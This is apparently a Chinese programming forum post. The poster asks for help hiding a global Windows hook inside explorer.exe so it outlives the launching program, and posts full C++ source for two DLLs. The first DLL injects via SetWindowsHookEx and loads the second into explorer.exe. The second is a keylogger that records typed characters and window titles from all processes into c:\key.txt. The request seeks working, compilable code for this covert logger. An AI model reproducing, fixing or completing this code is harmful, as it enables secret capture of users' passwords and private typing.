钩子隐藏的深入问题,(111222,panda_w、Kevin_qing,prog_st,azuo_lee,5 table, vcmfc,jiangsheng...全来
如何使explorer.exe挂上我写的一个2.dll
要求是用一个exe文件使explorer.exe挂上我写的一个dll,dll中有一个系统钩子
,再使exe文件结束,但dll不从explorer.exe脱离,系统钩子开始工作,可以随
explorer.exe一起生死,
下面是我看了一个delphi的例子的一些开发经验,
我先有一个exe文件调用一个1.dll,这个1.dll也是一个系统钩子,使钩子开始工作,
并在钩子工作的同时做出判断他处理消息的母体是不是explorer.exe,如果是
因为现在这一段1.dll已经在explorerl.exe的内存地址处了,我就为explorer.exe开
一个线程,loadlibrary(2.dll),并run(运行)2.dll中的另一个钩子,然后向exe程序
窗口发送WM_DESTROY消息终止exe程序,现在应该2.dll应该已经在explorer.exe中工作了
对不对?而exe程序和1.dll都已经退出.应该这个隐藏的在2.dll中的系统钩子就开始工作了对不对?
可是我可以调用2.dll中的系统钩子.但就是不能和explorer.exe捆绑,exe退出.2.dll也就退出了
还有向exe程序发WM_DESTROY消息窗口也不退出不知道是什么原因
请高手们帮助.以下是我的两个dll的原代码(高手们能不能帮我试试,是哪个地方出错了,
我对windows底层还是不太明白,大家一定要救小弟呀,先谢谢了
希望能有编译能过的原代码
一定给分
1.dll
nstall.cpp : Defines the entry point for the DLL application.
//
#include "stdafx.h"
#include "tlhelp32.h"
#pragma data_seg("sharedata")
BOOL flag=false;
#pragma data_seg()
#pragma comment(linker, "/section:sharedata,rws")
HINSTANCE hInst=NULL;
HHOOK hhook=NULL;
LRESULT CALLBACK msghook(UINT nCode, WPARAM wParam, LPARAM lParam);
DWORD WINAPI loadproc(LPVOID param);
extern "C" __declspec(dllexport) BOOL clearMyHook();
BOOL APIENTRY DllMain( HINSTANCE hInstance,
DWORD Reason,
LPVOID Reserved
)
{
switch(Reason)
{ /* reason */
case DLL_PROCESS_ATTACH:
hInst = hInstance;
return TRUE;
case DLL_PROCESS_DETACH:
return TRUE;
} /* reason */
return TRUE;
}
extern "C" __declspec(dllexport) BOOL setMyHook()
{
if(hhook != NULL)
return FALSE; // already hooked!
hhook = SetWindowsHookEx(WH_GETMESSAGE,(HOOKPROC)msghook,hInst,0);
if(hhook != NULL)
{ /* success */
return TRUE;
} /* success */
return FALSE; // failed to set hook
} // setMyHook
extern "C" __declspec(dllexport) BOOL clearMyHook()
{
if(hhook!=NULL)
return FALSE;
BOOL unhooked = UnhookWindowsHookEx(hhook);
return unhooked;
} // clearMyHook
static LRESULT CALLBACK msghook(UINT nCode, WPARAM wParam, LPARAM lParam)
{
MSG *msg=(MSG *)lParam;
if(nCode < 0)
{ /* pass it on */
CallNextHookEx(hhook, nCode, wParam, lParam);
return 0;
} /* pass it on */
else if(msg->message==WM_LBUTTONDOWN)
{ /*HINSTANCE testdll;
FARPROC run=NULL;
testdll=LoadLibrary("alltest.dll");
run=GetProcAddress(testdll,"setMyHook");
if(run!=NULL)
run();
*/
BOOL bHandle;
HANDLE handleshap;
PROCESSENTRY32 lppe;
lppe.dwSize=sizeof(PROCESSENTRY32);
handleshap=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
bHandle=Process32First(handleshap,&lppe);
while(bHandle)
{
if(GetCurrentProcessId()==lppe.th32ProcessID&&lstrcmp(lppe.szExeFile,"C:\\WINDOWS\\EXPLORER.EXE")==0)
{
DWORD id;
CreateThread(NULL,0,loadproc,NULL,0,&id);
PostMessage(FindWindow("testhide",NULL),WM_DESTROY,0,0);
}
bHandle=Process32Next(handleshap,&lppe);
}
}
return CallNextHookEx(hhook, nCode, wParam, lParam);
}
DWORD WINAPI loadproc(LPVOID param)
{
HINSTANCE testdll;
FARPROC run=NULL;
testdll=LoadLibrary("alltest.dll");
run=GetProcAddress(testdll,"setMyHook");
if(run!=NULL)
run();
flag=true;
return 0;
}
2.dll
#include "stdafx.h"
#pragma data_seg(".JOE")
HANDLE hFile=NULL;
HWND prewnd=NULL;
#pragma data_seg()
#pragma comment(linker, "/section:.JOE,rws")
HINSTANCE hInst=NULL;
HHOOK hhook=NULL;
//HHOOK hhook2=NULL;
LRESULT CALLBACK msghook(UINT nCode, WPARAM wParam, LPARAM lParam);
//LRESULT CALLBACK JournalRecordProc(UINT nCode,WPARAM wParam,LPARAM lParam);
extern "C" __declspec(dllexport) BOOL clearMyHook();
BOOL APIENTRY DllMain( HINSTANCE hInstance,
DWORD Reason,
LPVOID Reserved
)
{
switch(Reason)
{ /* reason */
case DLL_PROCESS_ATTACH:
hInst = hInstance;
return TRUE;
case DLL_PROCESS_DETACH:
if(hhook != NULL)
clearMyHook();
return TRUE;
} /* reason */
return TRUE;
}
extern "C" __declspec(dllexport) BOOL setMyHook()
{
if(hhook != NULL)
return FALSE; // already hooked!
MessageBox(NULL,"hi","hihi",NULL);
hhook = SetWindowsHookEx(WH_GETMESSAGE,
(HOOKPROC)msghook,
hInst,
0);
// hhook2=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalRecordProc,hInst,0);
if(hhook != NULL)
{ /* success */
return TRUE;
} /* success */
return FALSE; // failed to set hook
} // setMyHook
extern "C" __declspec(dllexport) BOOL clearMyHook()
{
if(hhook!=NULL)
return FALSE;
BOOL unhooked = UnhookWindowsHookEx(hhook);
CloseHandle(hFile);
return unhooked;
} // clearMyHook
static LRESULT CALLBACK msghook(UINT nCode, WPARAM wParam, LPARAM lParam)
{
if(nCode < 0)
{ /* pass it on */
CallNextHookEx(hhook, nCode, wParam, lParam);
return 0;
} /* pass it on */
LPMSG msg=(LPMSG)lParam;
char buffer;
DWORD number=0;
char winname[100];
if(msg->message==WM_CHAR)
{//如果某键被按下
buffer=(char)msg->wParam;
GetWindowText(GetParent(msg->hwnd),winname,100);
char *newname=new char[lstrlen(winname)+1];
lstrcpy(newname,winname);
hFile=CreateFile("c:\\key.txt",GENERIC_WRITE|GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
SetFilePointer(hFile,NULL,NULL,FILE_END);
if(GetParent(msg->hwnd)!=prewnd)
{
WriteFile(hFile,"\r\n",2,&number,NULL);
WriteFile(hFile,newname,lstrlen(newname)+1,&number,NULL);
WriteFile(hFile,"\r\n",2,&number,NULL);
prewnd=GetParent(msg->hwnd);
}
switch(buffer)
{
case 0x08:
SetFilePointer(hFile,-1,NULL,FILE_CURRENT);
SetEndOfFile(hFile);
break;
default:
WriteFile(hFile,&buffer,1,&number,NULL);
}
CloseHandle(hFile);
} // msghook
else if(msg->message==WM_IME_CHAR)
{
char chCharCode1 = (char)msg->wParam & 0xff;
char chCharCode2 = (char)msg->wParam >> 8;
GetWindowText(GetParent(msg->hwnd),winname,100);
char *newname=new char[lstrlen(winname)+1];
lstrcpy(newname,winname);
hFile=CreateFile("c:\\key.txt",GENERIC_WRITE|GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
SetFilePointer(hFile,NULL,NULL,FILE_END);
if(GetParent(msg->hwnd)!=prewnd)
{
if(prewnd!=NULL)
{
WriteFile(hFile,"\r\n",2,&number,NULL);
}
WriteFile(hFile,newname,lstrlen(newname)+1,&number,NULL);
WriteFile(hFile,"\r\n",2,&number,NULL);
prewnd=GetParent(msg->hwnd);
}
switch(msg->wParam)
{
case 0x08:
SetFilePointer(hFile,-2,NULL,FILE_CURRENT);
SetEndOfFile(hFile);
break;
default:
WriteFile(hFile,&chCharCode1,1,&number,NULL);
WriteFile(hFile,&chCharCode2,1,&number,NULL);
}
CloseHandle(hFile);
}
return CallNextHookEx(hhook, nCode, wParam, lParam);
}